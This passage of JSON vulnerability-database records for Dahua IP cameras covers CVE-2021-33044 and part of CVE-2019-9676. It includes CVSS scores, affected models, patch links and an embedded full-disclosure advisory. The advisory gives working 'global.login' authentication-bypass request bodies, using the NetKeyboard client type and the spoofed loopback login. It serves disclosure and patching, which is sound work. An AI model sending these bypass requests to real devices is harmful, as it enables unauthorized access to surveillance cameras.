"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-33044",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-000007",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-33044",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "IPA",
"id": "JVNDB-2024-000007",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-103421",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-70816",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-1080",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis \u003cmcw noemail eu\u003e (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R\u0026D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n[Example]\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"loginType\": \"Direct\",\n \"clientType\": \"NetKeyboard\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"Not Used\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"[REDACTED]\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Plain\",\n \"password\": \"admin\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n[ETX]\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 3.51
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33044",
"trust": 5.4
},
{
"db": "PACKETSTORM",
"id": "164423",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVN83655695",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-103421",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2021-70816",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-33044",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"id": "VAR-202109-1875",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
}
]
},
"last_update_date": "2024-01-19T23:24:12.199000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dahua\u00a0Technology : DHCC-SA-202106-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"title": "DHCC-SA-202106-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/aboutus/trustedcenter/details/582"
},
{
"title": "Patch for Dahua IPC authentication bypass vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/311536"
},
{
"title": "Patch for Identity authentication bypass vulnerabilities in some Dahua products",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/290751"
},
{
"title": "Dahua IPC Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164675"
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/mcw0/poc "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "Inappropriate authentication (CWE-287) [IPA evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2021/oct/13"
},
{
"trust": 2.3,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33044"
},
{
"trust": 0.8,
"url": "https://jvn.jp/jp/jvn83655695/index.html"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/poc"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/dahuaconsole"
},
{
"trust": 0.1,
"url": "https://www.dahuasecurity.com/support/downloadcenter/firmware"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33045"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"date": "2022-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"date": "2024-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"date": "2021-10-06T15:11:51",
"db": "PACKETSTORM",
"id": "164423"
},
{
"date": "2021-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"date": "2021-09-15T22:15:10.497000",
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"date": "2022-08-31T04:47:00",
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"date": "2024-01-18T03:08:00",
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"date": "2021-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"date": "2021-12-02T13:50:00.800000",
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Dahua\u00a0 Product certification vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
}
],
"trust": 0.6
}
}
VAR-201906-0243
Vulnerability from variot - Updated: 2023-12-18 14:05Buffer overflow vulnerability found in some Dahua IP Camera devices IPC-HFW1XXX,IPC-HDW1XXX,IPC-HFW2XXX Build before 2018/11. The vulnerability exits in the function of redirection display for serial port printing information, which can not be used by product basic functions. After an attacker logs in locally, this vulnerability can be exploited to cause device restart or arbitrary code execution. Dahua has identified the corresponding security problems in the static code auditing process, so it has gradually deleted this function, which is no longer available in the newer devices and softwares. Dahua has released versions of the affected products to fix the vulnerability. Dahua IPC-HFW1XXX , IPC-HDW1XXX , IPC-HFW2XXX The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaIPC-HFW1XXX and so on are all IP cameras from Dahua, China
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0243",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hfw2xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2018-11"
},
{
"model": "ipc-hdw1xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2018-11"
},
{
"model": "ipc-hfw1xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2018-11"
},
{
"model": "ipc-hdw1xxx",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2018/11"
},
{
"model": "ipc-hfw1xxx",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2018/11"
},
{
"model": "ipc-hfw2xxx",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2018/11"
},
{
"model": "ipc-hdw1xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw1xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "NVD",
"id": "CVE-2019-9676"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw1xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2018-11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw1xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2018-11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2018-11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9676"
}
]
},
"cve": "CVE-2019-9676",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-9676",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-17496",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-9676",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-9676",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-17496",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-556",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "NVD",
"id": "CVE-2019-9676"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow vulnerability found in some Dahua IP Camera devices IPC-HFW1XXX,IPC-HDW1XXX,IPC-HFW2XXX Build before 2018/11. The vulnerability exits in the function of redirection display for serial port printing information, which can not be used by product basic functions. After an attacker logs in locally, this vulnerability can be exploited to cause device restart or arbitrary code execution. Dahua has identified the corresponding security problems in the static code auditing process, so it has gradually deleted this function, which is no longer available in the newer devices and softwares. Dahua has released versions of the affected products to fix the vulnerability. Dahua IPC-HFW1XXX , IPC-HDW1XXX , IPC-HFW2XXX The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaIPC-HFW1XXX and so on are all IP cameras from Dahua, China",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9676"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "CNVD",
"id": "CNVD-2019-17496"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9676",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-17496",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-556",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "NVD",
"id": "CVE-2019-9676"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
]
},
"id": "VAR-201906-0243",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
}
],
"trust": 1.1944444333333335
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
}
]
},
"last_update_date": "2023-12-18T14:05:08.331000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory - Buffer overflow vulnerability found in some Dahua IP Camera devices",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/617"
},
{
"title": "Patch for DahuaIPC-HFW1XXX, IPC-HDW1XXX, and IPC-HFW2XXX Buffer Overflow Vulnerabilities",
